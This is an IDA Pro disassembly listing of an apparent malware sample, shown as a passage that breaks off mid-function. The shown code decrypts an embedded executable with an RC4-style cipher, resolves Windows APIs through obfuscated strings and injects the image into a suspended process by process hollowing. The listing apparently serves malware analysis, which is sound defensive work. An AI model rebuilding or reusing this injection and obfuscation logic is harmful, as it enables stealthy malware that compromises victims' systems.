;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 3E69C646393CE03180FD73BD13AA99B2
; File Name : u:\work\3e69c646393ce03180fd73bd13aa99b2_orig.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00001A6B ( 6763.)
; Section size in file : 00001C00 ( 7168.)
; Offset to raw data for section: 00000400
; Flags 60000020: Text Executable Readable
; Alignment : default
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
sub_401000 proc near ; CODE XREF: sub_401040+15�p
; sub_401190+10�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
imul esi, [esp+4+arg_4]
push edi
push esi ; dwBytes
push 0 ; uFlags
call ds:GlobalAlloc ; GlobalAlloc
mov edx, eax
mov ecx, esi
xor eax, eax
mov edi, edx
shr ecx, 2
rep stosd
mov ecx, esi
and ecx, 3
rep stosb
pop edi
mov eax, edx
pop esi
retn
sub_401000 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_401030(HGLOBAL hMem)
sub_401030 proc near ; CODE XREF: sub_401670+203�p
hMem = dword ptr 4
mov eax, [esp+hMem]
push eax ; hMem
call ds:GlobalFree ; GlobalFree
retn
sub_401030 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401040 proc near ; CODE XREF: sub_401C50+E�p
; sub_401C50+41�p ...
var_108 = dword ptr -108h
var_104 = dword ptr -104h
var_100 = byte ptr -100h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
sub esp, 108h
mov eax, [esp+108h+arg_8]
push 1
lea eax, [eax+eax*4]
shl eax, 1
push eax
call sub_401000
add esp, 8
mov [esp+108h+var_104], eax
test eax, eax
jnz short loc_40106C
add esp, 108h
retn
; ---------------------------------------------------------------------------
loc_40106C: ; CODE XREF: sub_401040+23�j
xor eax, eax
loc_40106E: ; CODE XREF: sub_401040+38�j
mov [esp+eax+108h+var_100], al
inc eax
cmp eax, 0FFh
jle short loc_40106E
push ebx
push ebp
mov ebp, [esp+110h+arg_0]
push esi
xor ebx, ebx
push edi
xor esi, esi
loc_401089: ; CODE XREF: sub_401040+9A�j
mov cl, [esp+esi+118h+var_100]
mov edi, ebp
mov byte ptr [esp+118h+var_108], cl
or ecx, 0FFFFFFFFh
xor eax, eax
xor edx, edx
repne scasb
not ecx
dec ecx
mov eax, esi
div ecx
mov eax, [esp+118h+var_108]
mov ecx, eax
and ecx, 0FFh
movsx edx, byte ptr [edx+ebp]
add ebx, edx
add ebx, ecx
and ebx, 800000FFh
jns short loc_4010C7
dec ebx
or ebx, 0FFFFFF00h
inc ebx
loc_4010C7: ; CODE XREF: sub_401040+7D�j
mov dl, [esp+ebx+118h+var_100]
mov [esp+esi+118h+var_100], dl
inc esi
cmp esi, 0FFh
mov [esp+ebx+118h+var_100], al
jle short loc_401089
mov ecx, [esp+118h+arg_8]
xor esi, esi
xor eax, eax
test ecx, ecx
jle loc_40117C
mov ebp, [esp+118h+arg_4]
mov ecx, [esp+118h+var_104]
sub ebp, ecx
loc_4010FC: ; CODE XREF: sub_401040+13A�j
mov ecx, eax
and ecx, 800000FFh
jns short loc_40110E
dec ecx
or ecx, 0FFFFFF00h
inc ecx
loc_40110E: ; CODE XREF: sub_401040+C4�j
mov dl, [esp+ecx+118h+var_100]
lea ecx, [esp+ecx+118h+var_100]
mov edi, edx
and edi, 0FFh
add esi, edi
and esi, 800000FFh
jns short loc_401130
dec esi
or esi, 0FFFFFF00h
inc esi
loc_401130: ; CODE XREF: sub_401040+E6�j
mov bl, [esp+esi+118h+var_100]
mov byte ptr [esp+118h+var_108], dl
mov [ecx], bl
mov [esp+esi+118h+var_100], dl
mov edx, [esp+118h+var_104]
lea edi, [eax+edx]
xor edx, edx
mov dl, [ecx]
mov ecx, [esp+118h+var_108]
and ecx, 0FFh
add edx, ecx
and edx, 800000FFh
jns short loc_401165
dec edx
or edx, 0FFFFFF00h
inc edx
loc_401165: ; CODE XREF: sub_401040+11B�j
mov dl, [esp+edx+118h+var_100]
mov bl, [edi+ebp]
mov ecx, [esp+118h+arg_8]
xor dl, bl
inc eax
mov [edi], dl
cmp eax, ecx
jl short loc_4010FC
loc_40117C: ; CODE XREF: sub_401040+A9�j
mov eax, [esp+118h+var_104]
pop edi
pop esi
pop ebp
pop ebx
add esp, 108h
retn
sub_401040 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401190 proc near ; CODE XREF: sub_402850+EE�p
var_4 = byte ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ecx
push ebx
mov ebx, [esp+8+arg_4]
push esi
mov esi, ebx
push edi
push 1
shl esi, 4
push esi
call sub_401000
mov edi, eax
add esp, 8
test edi, edi
jnz short loc_4011B3
pop edi
pop esi
pop ebx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_4011B3: ; CODE XREF: sub_401190+1C�j
lea eax, [esp+10h+arg_4]
lea ecx, [esp+10h+var_4]
push eax
push ecx
push 2
call dword_4042D8
mov edx, [esp+10h+arg_8]
mov eax, [esp+10h+arg_0]
push edx
push ebx
push eax
push esi
push edi
push 2
call dword_4042C4
mov eax, edi
pop edi
pop esi
pop ebx
pop ecx
retn
sub_401190 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4011F0 proc near ; CODE XREF: sub_401210+10�p
; sub_401210+4D�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
mov eax, [esp+arg_0]
xor edx, edx
lea eax, [eax+ecx-1]
div ecx
imul eax, ecx
retn
sub_4011F0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401210 proc near ; CODE XREF: sub_4012C0+60�p
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
push ebp
push esi
mov esi, [esp+0Ch+arg_8]
push edi
mov eax, [esi+38h]
mov ecx, [esi+54h]
push eax
push ecx
call sub_4011F0
xor ebp, ebp
add esp, 8
cmp [esi+6], bp
mov ebx, eax
jbe short loc_4012A6
mov edx, [esp+10h+arg_C]
lea edi, [edx+0Ch]
loc_401239: ; CODE XREF: sub_401210+94�j
mov edx, [edi+4]
mov eax, [edi+8]
mov ecx, [esp+10h+arg_4]
add eax, edx
cmp eax, ecx
ja short loc_4012AD
mov eax, [edi]
test eax, eax
jz short loc_40127C
mov ecx, [edi-4]
test ecx, ecx
jz short loc_401269
mov edx, [esi+38h]
add ecx, eax
push edx
push ecx
call sub_4011F0
add esp, 8
mov ebx, eax
jmp short loc_401298
; ---------------------------------------------------------------------------
loc_401269: ; CODE XREF: sub_401210+44�j
mov ecx, [esi+38h]
add edx, eax
push ecx
push edx
call sub_4011F0
add esp, 8
mov ebx, eax
jmp short loc_401298
; ---------------------------------------------------------------------------
loc_40127C: ; CODE XREF: sub_401210+3D�j
mov eax, [edi-4]
cmp eax, edx
jnb short loc_401289
mov edx, [esi+38h]
push edx
jmp short loc_40128D
; ---------------------------------------------------------------------------
loc_401289: ; CODE XREF: sub_401210+71�j
mov ecx, [esi+38h]
push ecx
loc_40128D: ; CODE XREF: sub_401210+77�j
push eax
call sub_4011F0
add esp, 8
add ebx, eax
loc_401298: ; CODE XREF: sub_401210+57�j
; sub_401210+6A�j
xor edx, edx
inc ebp
mov dx, [esi+6]
add edi, 28h
cmp ebp, edx
jl short loc_401239
loc_4012A6: ; CODE XREF: sub_401210+20�j
pop edi
pop esi
mov eax, ebx
pop ebp
pop ebx
retn
; ---------------------------------------------------------------------------
loc_4012AD: ; CODE XREF: sub_401210+37�j
pop edi
pop esi
pop ebp
xor eax, eax
pop ebx
retn
sub_401210 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4012C0 proc near ; CODE XREF: sub_401890+25�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
arg_10 = dword ptr 14h
arg_14 = dword ptr 18h
mov ecx, [esp+arg_4]
push ebp
cmp ecx, 40h
push esi
jb loc_401449
mov eax, [esp+8+arg_0]
cmp word ptr [eax], 5A4Dh
jnz loc_401449
mov esi, [eax+3Ch]
lea edx, [esi+0F8h]
cmp ecx, edx
jl loc_401449
mov edx, [esi+eax]
add esi, eax
cmp edx, 4550h
jnz loc_401449
test byte ptr [esi+17h], 20h
jnz loc_401449
cmp word ptr [esi+14h], 0E0h
jnz loc_401449
lea ebp, [esi+0F8h]
push ebp
push esi
push ecx
push eax
call sub_401210
mov ecx, [esp+18h+arg_14]
add esp, 10h
test eax, eax
mov [ecx], eax
jz loc_401449
push ebx
push edi
push 40h
push 1000h
push eax
push 0
call dword_404338
mov ebx, [esp+10h+arg_10]
test eax, eax
mov [ebx], eax
jz loc_40143F
mov edi, [esi+54h]
xor ecx, ecx
mov cx, [esi+6]
test ecx, ecx
jle short loc_401378
lea esi, [ebp+14h]
loc_401366: ; CODE XREF: sub_4012C0+B6�j
mov edx, [esi]
test edx, edx
jz short loc_401372
cmp edx, edi
jnb short loc_401372
mov edi, edx
loc_401372: ; CODE XREF: sub_4012C0+AA�j
; sub_4012C0+AE�j
add esi, 28h
dec ecx
jnz short loc_401366
loc_401378: ; CODE XREF: sub_4012C0+A1�j
mov edx, [esp+10h+arg_0]
push edi
push edx
push eax
call sub_402450
mov eax, [ebx]
mov edi, [esp+1Ch+arg_8]
mov ebp, [esp+1Ch+arg_C]
mov ecx, [eax+3Ch]
add eax, ecx
mov [edi], eax
add eax, 0F8h
mov [ebp+0], eax
mov eax, [edi]
mov edx, [eax+38h]
mov eax, [eax+54h]
push edx
push eax
call sub_4011F0
mov ecx, [ebx]
mov esi, eax
add esi, ecx
mov ecx, [edi]
xor ebx, ebx
add esp, 14h
cmp [ecx+6], bx
mov [esp+10h+arg_4], ebx
jbe short loc_40143F
loc_4013C3: ; CODE XREF: sub_4012C0+17D�j
mov edx, [ebp+0]
lea eax, [ebx+edx]
mov edx, [ebx+edx+0Ch]
test edx, edx
jz short loc_4013D9
mov esi, [esp+10h+arg_10]
add edx, [esi]
mov esi, edx
loc_4013D9: ; CODE XREF: sub_4012C0+10F�j
mov edx, [eax+10h]
test edx, edx
jz short loc_401415
mov eax, [eax+14h]
mov ecx, [esp+10h+arg_0]
add eax, ecx
push edx
push eax
push esi
call sub_402450
mov ecx, [ebp+0]
mov edx, [edi]
add esp, 0Ch
lea eax, [ebx+ecx]
mov ecx, [ebx+ecx+8]
mov eax, [eax+10h]
cmp ecx, eax
jnb short loc_40140E
mov ecx, [edx+38h]
push ecx
push eax
jmp short loc_40141D
; ---------------------------------------------------------------------------
loc_40140E: ; CODE XREF: sub_4012C0+145�j
mov eax, [edx+38h]
push eax
push ecx
jmp short loc_40141D
; ---------------------------------------------------------------------------
loc_401415: ; CODE XREF: sub_4012C0+11E�j
mov ecx, [ecx+38h]
mov edx, [eax+8]
push ecx
push edx
loc_40141D: ; CODE XREF: sub_4012C0+14C�j
; sub_4012C0+153�j
call sub_4011F0
mov ecx, [edi]
add esi, eax
mov eax, [esp+18h+arg_4]
xor edx, edx
mov dx, [ecx+6]
add esp, 8
inc eax
add ebx, 28h
cmp eax, edx
mov [esp+10h+arg_4], eax
jl short loc_4013C3
loc_40143F: ; CODE XREF: sub_4012C0+90�j
; sub_4012C0+101�j
pop edi
pop ebx
pop esi
mov eax, 1
pop ebp
retn
; ---------------------------------------------------------------------------
loc_401449: ; CODE XREF: sub_4012C0+9�j
; sub_4012C0+18�j ...
pop esi
xor eax, eax
pop ebp
retn
sub_4012C0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401450 proc near ; CODE XREF: sub_401460+12�p
; sub_401670:loc_401727�p
mov ecx, dword_40431C
xor eax, eax
test ecx, ecx
setnz al
retn
sub_401450 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401460 proc near ; CODE XREF: sub_401670+2C�p
arg_0 = dword ptr 4
push ebx
push 1
push 100h
call sub_401000
add esp, 8
mov ebx, eax
call sub_401450
test eax, eax
jz short loc_4014C4
push esi
push edi
mov ecx, 40h
xor eax, eax
mov edi, ebx
push 100h
push ebx
push eax
rep stosd
call dword_4042FC
mov edi, [esp+0Ch+arg_0]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov edx, ecx
mov edi, ebx
or ecx, 0FFFFFFFFh
repne scasb
mov ecx, edx
dec edi
shr ecx, 2
rep movsd
mov ecx, edx
mov eax, ebx
and ecx, 3
rep movsb
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_4014C4: ; CODE XREF: sub_401460+19�j
xor eax, eax
pop ebx
retn
sub_401460 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4014D0 proc near ; CODE XREF: sub_401670+FA�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, [eax+0A0h]
test ecx, ecx
jz short loc_4014EE
mov ecx, [eax+0A4h]
test ecx, ecx
jz short loc_4014EE
mov eax, 1
retn
; ---------------------------------------------------------------------------
loc_4014EE: ; CODE XREF: sub_4014D0+C�j
; sub_4014D0+16�j
xor eax, eax
retn
sub_4014D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401500 proc near ; CODE XREF: sub_401670+12A�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
mov ecx, [esp+arg_4]
mov eax, [eax+0A0h]
add eax, ecx
mov ecx, [eax+4]
mov edx, [eax]
add ecx, edx
jz short locret_401539
push esi
loc_40151A: ; CODE XREF: sub_401500+36�j
lea ecx, [eax+8]
mov eax, [eax+4]
sub eax, 8
shr eax, 1
cmp eax, 1
jb short loc_40152D
lea ecx, [ecx+eax*2]
loc_40152D: ; CODE XREF: sub_401500+28�j
mov edx, [ecx+4]
mov esi, [ecx]
add edx, esi
mov eax, ecx
jnz short loc_40151A
pop esi
locret_401539: ; CODE XREF: sub_401500+17�j
retn
sub_401500 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401540 proc near ; CODE XREF: sub_401670+CA�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push edi
push offset LibFileName ; "ntdll.dll"
xor esi, esi
call ds:LoadLibraryA ; LoadLibraryA
mov edi, eax
test edi, edi
jz short loc_401573
mov eax, [esp+8+arg_4]
mov ecx, [esp+8+arg_0]
push eax
push ecx
call dword_4042D0
mov esi, eax
push edi
neg esi
sbb esi, esi
inc esi
call dword_4042D4
loc_401573: ; CODE XREF: sub_401540+13�j
mov eax, esi
pop edi
pop esi
retn
sub_401540 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401580 proc near ; CODE XREF: sub_401670+6B�p
var_74 = byte ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = byte ptr -60h
var_44 = dword ptr -44h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
arg_10 = dword ptr 14h
arg_14 = dword ptr 18h
arg_18 = dword ptr 1Ch
sub esp, 74h
push ebp
push edi
mov ecx, 11h
xor eax, eax
lea edi, [esp+7Ch+var_44]
lea edx, [esp+7Ch+var_44]
rep stosd
mov [esp+7Ch+var_70], eax
lea ecx, [esp+7Ch+var_70]
mov [esp+7Ch+var_6C], eax
push ecx
mov [esp+80h+var_68], eax
push edx
push eax
push eax
push 4
push eax
push eax
mov [esp+98h+var_64], eax
push eax
mov eax, [esp+9Ch+arg_0]
push eax
push 0
mov [esp+0A4h+var_44], 44h
call dword_4042E4
mov ebp, eax
test ebp, ebp
jz loc_401661
mov edi, [esp+7Ch+arg_8]
mov ecx, [esp+7Ch+var_70]
mov eax, [esp+7Ch+arg_C]
mov edx, [esp+7Ch+var_6C]
push ebx
mov [edi], ecx
mov ecx, [esp+80h+arg_10]
push esi
mov esi, [esp+84h+arg_4]
mov [eax], edx
mov edx, [esp+84h+var_68]
push esi
mov [ecx], edx
mov dword ptr [esi], 10007h
mov eax, [eax]
push eax
call dword_4042C8
mov edx, [esi+0A4h]
mov ebx, [esp+84h+arg_14]
mov eax, [edi]
lea ecx, [esp+84h+var_74]
push ecx
push 4
add edx, 8
push ebx
push edx
push eax
call dword_4042E8
mov esi, [ebx]
mov edx, [edi]
lea ecx, [esp+84h+var_60]
push 1Ch
push ecx
push esi
push edx
call dword_4042F0
mov eax, [ebx]
sub esi, eax
mov eax, [esp+84h+arg_18]
mov [eax], esi
pop esi
pop ebx
mov eax, ebp
pop edi
pop ebp
add esp, 74h
retn
; ---------------------------------------------------------------------------
loc_401661: ; CODE XREF: sub_401580+4F�j
mov eax, ebp
pop edi
pop ebp
add esp, 74h
retn
sub_401580 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401670 proc near ; CODE XREF: sub_401890+4F�p
var_2E4 = dword ptr -2E4h
var_2E0 = dword ptr -2E0h
var_2DC = dword ptr -2DCh
var_2D8 = dword ptr -2D8h
var_2D4 = byte ptr -2D4h
var_2D0 = dword ptr -2D0h
var_2CC = byte ptr -2CCh
var_228 = dword ptr -228h
var_21C = dword ptr -21Ch
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_C = dword ptr 10h
arg_10 = dword ptr 14h
arg_14 = dword ptr 18h
sub esp, 2E4h
mov ecx, [esp+2E4h+arg_0]
push ebp
push esi
mov esi, [esp+2ECh+arg_4]
push edi
mov edi, [esp+2F0h+arg_10]
mov eax, [esi+34h]
push edi
push eax
push ecx
mov [esp+2FCh+var_2E4], 0FFFFFFFFh
call sub_401460
mov ebp, eax
add esp, 0Ch
test ebp, ebp
jnz short loc_4016B8
mov eax, [esp+2F0h+var_2E4]
pop edi
pop esi
pop ebp
add esp, 2E4h
retn
; ---------------------------------------------------------------------------
loc_4016B8: ; CODE XREF: sub_401670+38�j
mov ecx, [esp+2F0h+arg_14]
lea edx, [esp+2F0h+var_2D0]
push ebx
lea eax, [esp+2F4h+var_2D8]
push edx
push eax
lea edx, [esp+2FCh+var_2DC]
push ecx
lea eax, [esp+300h+var_2E4]
push edx
lea ecx, [esp+304h+var_2CC]
push eax
push ecx
push ebp
call sub_401580
add esp, 1Ch
test eax, eax
jz loc_401872
mov eax, [esp+2F4h+var_2D8]
mov ecx, [esi+34h]
mov ebx, [esp+2F4h+arg_C]
cmp ecx, eax
mov [esp+2F4h+var_2E0], 0
jnz short loc_401727
mov ecx, [esp+2F4h+var_2D0]
cmp ecx, edi
jb short loc_401727
lea edx, [esp+2F4h+var_2D4]
mov [esp+2F4h+var_2E0], eax
push edx
push 40h
push ecx
push eax
mov eax, [esp+304h+var_2E4]
push eax
call dword_4042F8
jmp short loc_4017A2
; ---------------------------------------------------------------------------
loc_401727: ; CODE XREF: sub_401670+93�j
; sub_401670+9B�j
call sub_401450
test eax, eax
jz short loc_4017A2
mov ecx, [esp+2F4h+var_2D8]
mov edx, [esp+2F4h+var_2E4]
push ecx
push edx
call sub_401540
add esp, 8
test eax, eax
jz short loc_401761
mov eax, [esi+34h]
mov ecx, [esp+2F4h+var_2E4]
push 40h
push 3000h
push edi
push eax
push ecx
call dword_40431C
mov [esp+2F4h+var_2E0], eax
loc_401761: ; CODE XREF: sub_401670+D4�j
mov eax, [esp+2F4h+var_2E0]
test eax, eax
jnz short loc_4017AE
push esi
call sub_4014D0
add esp, 4
test eax, eax
jz short loc_4017A2
mov edx, [esp+2F4h+var_2E4]
push 40h
push 3000h
push edi
push 0
push edx
call dword_40431C
test eax, eax
mov [esp+2F4h+var_2E0], eax
jz loc_401847
push eax
push ebx
push esi
call sub_401500
add esp, 0Ch
loc_4017A2: ; CODE XREF: sub_401670+B5�j
; sub_401670+BE�j ...
mov eax, [esp+2F4h+var_2E0]
test eax, eax
jz loc_401847
loc_4017AE: ; CODE XREF: sub_401670+F7�j
mov edx, [esp+2F4h+var_228]
lea eax, [esp+2F4h+var_2D4]
push eax
mov eax, [esp+2F8h+var_2E4]
lea ecx, [esp+2F8h+var_2E0]
push 4
add edx, 8
push ecx
push edx
push eax
call dword_404320
mov eax, [esp+2F4h+var_2E0]
mov edx, [esp+2F4h+var_2E4]
lea ecx, [esp+2F4h+var_2D4]
mov [esi+34h], eax
push ecx
push edi
push ebx
push eax
push edx
call dword_404320
test eax, eax
jz short loc_401847
mov eax, [esp+2F4h+var_2E0]
mov ecx, [esp+2F4h+var_2D8]
cmp eax, ecx
mov dword ptr [esp+2F4h+var_2CC], 10007h
jnz short loc_401813
mov eax, [esi+28h]
mov ecx, [esi+34h]
add eax, ecx
mov [esp+2F4h+var_21C], eax
jmp short loc_40181F
; ---------------------------------------------------------------------------
loc_401813: ; CODE XREF: sub_401670+190�j
mov ecx, [esi+28h]
add ecx, eax
mov [esp+2F4h+var_21C], ecx
loc_40181F: ; CODE XREF: sub_401670+1A1�j
mov eax, [esp+2F4h+var_2DC]
lea edx, [esp+2F4h+var_2CC]
push edx
push eax
call dword_404314
mov ecx, [esp+2F4h+var_2DC]
push ecx
call dword_40430C
mov edx, [esp+2F4h+var_2DC]
push edx
call dword_4042CC
jmp short loc_401872
; ---------------------------------------------------------------------------
loc_401847: ; CODE XREF: sub_401670+121�j
; sub_401670+138�j ...
mov eax, [esp+2F4h+var_2E4]
push 0
push eax
call dword_404330
mov ecx, [esp+2F4h+var_2DC]
push ecx
call dword_4042CC
mov edx, [esp+2F4h+var_2E4]
push edx
call dword_4042CC
mov [esp+2F4h+var_2E4], 0FFFFFFFFh
loc_401872: ; CODE XREF: sub_401670+75�j
; sub_401670+1D5�j
push ebp ; hMem
call sub_401030
mov eax, [esp+2F8h+var_2E4]
add esp, 4
pop ebx
pop edi
pop esi
pop ebp
add esp, 2E4h
retn
sub_401670 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401890 proc near ; CODE XREF: sub_402850+10D�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
sub esp, 8
lea eax, [esp+8+arg_4]
lea ecx, [esp+8+arg_0]
lea edx, [esp+8+var_8]
push esi
push eax
push ecx
mov ecx, [esp+14h+arg_4]
lea eax, [esp+14h+var_4]
push edx
mov edx, [esp+18h+arg_0]
push eax
push ecx
push edx
or esi, 0FFFFFFFFh
call sub_4012C0
add esp, 18h
test eax, eax
jz short loc_4018FE
mov eax, [esp+0Ch+arg_C]
mov ecx, [esp+0Ch+arg_4]
mov edx, [esp+0Ch+arg_0]
push eax
mov eax, [esp+10h+var_8]
push ecx
mov ecx, [esp+14h+var_4]
push edx
mov edx, [esp+18h+arg_8]
push eax
push ecx
push edx
call sub_401670
mov ecx, [esp+24h+arg_0]
add esp, 18h
mov esi, eax
mov eax, [esp+0Ch+arg_4]
push 4000h
push eax
push ecx
call dword_4042F4
loc_4018FE: ; CODE XREF: sub_401890+2F�j
mov eax, esi
pop esi
add esp, 8
retn
sub_401890 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401910 proc near ; CODE XREF: sub_402850+3A�p
push ebx
push ebp
push esi
push edi
push offset ModuleName ; "Vs"
call ds:GetModuleHandleA ; GetModuleHandleA
mov esi, ds:LoadLibraryA
push offset aSle ; "Se"
mov ebx, eax
call esi ; LoadLibraryA
push offset aYka ; "Ya"
mov edi, eax
call esi ; LoadLibraryA
mov esi, ds:GetProcAddress
push offset ProcName ; "ne\n"
push edi ; hModule
mov ebp, eax
call esi ; GetProcAddress
push offset aNzeB ; "ne\n"
push edi ; hModule
mov dword_404338, eax
call esi ; GetProcAddress
push offset dword_404050 ; lpProcName
push edi ; hModule
mov dword_40431C, eax
call esi ; GetProcAddress
push offset aBB ; "bB"
push ebx ; hModule
mov dword_4042FC, eax
call esi ; GetProcAddress
push offset aR ; "~r\x1B"
push edi ; hModule
mov dword_4042D0, eax
call esi ; GetProcAddress
push offset aR_0 ; "{r"
push edi ; hModule
mov dword_4042D4, eax
call esi ; GetProcAddress
push offset dword_404098 ; lpProcName
push edi ; hModule
mov dword_4042E4, eax
call esi ; GetProcAddress
push offset aJlv ; "jv"
push edi ; hModule
mov dword_4042C8, eax
call esi ; GetProcAddress
push offset aNzeB_0 ; "ne\n"
push edi ; hModule
mov dword_4042E8, eax
call esi ; GetProcAddress
push offset aNzeB_1 ; "ne\n"
push edi ; hModule
mov dword_4042F0, eax
call esi ; GetProcAddress
push offset aOSAEg ; "o~\n-a&EG"
push edi ; hModule
mov dword_4042F8, eax
call esi ; GetProcAddress
push offset aKlc ; "kc*"
push edi ; hModule
mov dword_404320, eax
call esi ; GetProcAddress
push offset aJldS ; "jd\v"
push edi ; hModule
mov dword_404314, eax
call esi ; GetProcAddress
push offset aVxS5Lq ; "{x\r5`!LQ"
push edi ; hModule
mov dword_40430C, eax
call esi ; GetProcAddress
push offset aLle ; "le"
push edi ; hModule
mov dword_4042CC, eax
call esi ; GetProcAddress
push offset aNzeB_2 ; "ne\n"
push edi ; hModule
mov dword_404330, eax
call esi ; GetProcAddress
push offset dword_404160 ; lpProcName
mov dword_4042F4, eax
push edi ; hModule
call esi ; GetProcAddress
push offset aKlc2i ; "kc2"
push edi ; hModule
mov dword_40432C, eax
call esi ; GetProcAddress
push offset aKvrD ; "kr\x1B"
push edi ; hModule
mov dword_404304, eax
call esi ; GetProcAddress
push offset aJI ; "j{="
push ebx ; hModule
mov dword_4042DC, eax
call esi ; GetProcAddress
push offset aJS ; "j{:"
push ebx ; hModule
mov dword_404310, eax
call esi ; GetProcAddress
push offset aJ9s ; "j{9\t"
push ebx ; hModule
mov dword_4042C4, eax
call esi ; GetProcAddress
push offset aR_1 ; "{r"
push edi ; hModule
mov dword_4042D8, eax
call esi ; GetProcAddress
push offset aJlv_0 ; "jv"
push edi ; hModule
mov dword_404300, eax
call esi ; GetProcAddress
push offset aKlc8a ; "kc8"
push edi ; hModule
mov dword_4042EC, eax
call esi ; GetProcAddress
push offset dword_4041D0 ; lpProcName
push edi ; hModule
mov dword_404334, eax
call esi ; GetProcAddress
push offset dword_404200 ; lpProcName
push ebp ; hModule
mov dword_404308, eax
call esi ; GetProcAddress
push offset aJlp1d ; "jp1"
push ebp ; hModule
mov dword_404324, eax
call esi ; GetProcAddress
push offset aJlpB ; "jp/"
push ebp ; hModule
mov dword_404318, eax
call esi ; GetProcAddress
push offset aJlpS ; "jp="
push ebp ; hModule
mov dword_4042E0, eax
call esi ; GetProcAddress
mov ecx, dword_404338
mov dword_404328, eax
test ecx, ecx
jz loc_401C36
mov ecx, dword_40431C
test ecx, ecx
jz loc_401C36
mov ecx, dword_4042FC
test ecx, ecx
jz loc_401C36
mov ecx, dword_4042D0
test ecx, ecx
jz loc_401C36
mov ecx, dword_4042D4
test ecx, ecx
jz loc_401C36
mov ecx, dword_4042E4
test ecx, ecx
jz loc_401C36
mov ecx, dword_4042C8
test ecx, ecx
jz loc_401C36
mov ecx, dword_4042E8
test ecx, ecx
jz loc_401C36
mov ecx, dword_4042F0
test ecx, ecx
jz loc_401C36
mov ecx, dword_4042F8
test ecx, ecx
jz loc_401C36
mov ecx, dword_404320
test ecx, ecx
jz loc_401C36
mov ecx, dword_404314
test ecx, ecx
jz loc_401C36
mov ecx, dword_40430C
test ecx, ecx
jz loc_401C36
mov ecx, dword_4042CC
test ecx, ecx
jz loc_401C36
mov ecx, dword_404330
test ecx, ecx
jz loc_401C36
mov ecx, dword_4042F4
test ecx, ecx
jz loc_401C36
mov ecx, dword_40432C
test ecx, ecx
jz loc_401C36
mov ecx, dword_404304
test ecx, ecx
jz short loc_401C36
mov ecx, dword_4042DC
test ecx, ecx
jz short loc_401C36
mov ecx, dword_404310
test ecx, ecx
jz short loc_401C36
mov ecx, dword_4042C4
test ecx, ecx
jz short loc_401C36
mov ecx, dword_4042D8
test ecx, ecx
jz short loc_401C36
mov ecx, dword_404300
test ecx, ecx
jz short loc_401C36
mov ecx, dword_4042EC
test ecx, ecx
jz short loc_401C36
mov ecx, dword_404334
test ecx, ecx
jz short loc_401C36
mov ecx, dword_404308
test ecx, ecx
jz short loc_401C36
mov ecx, dword_404324
test ecx, ecx
jz short loc_401C36
mov ecx, dword_404318
test ecx, ecx
jz short loc_401C36
mov ecx, dword_4042E0
test ecx, ecx
jz short loc_401C36
test eax, eax
jz short loc_401C36
pop edi
pop esi
pop ebp
mov al, 1
pop ebx
retn
; ---------------------------------------------------------------------------
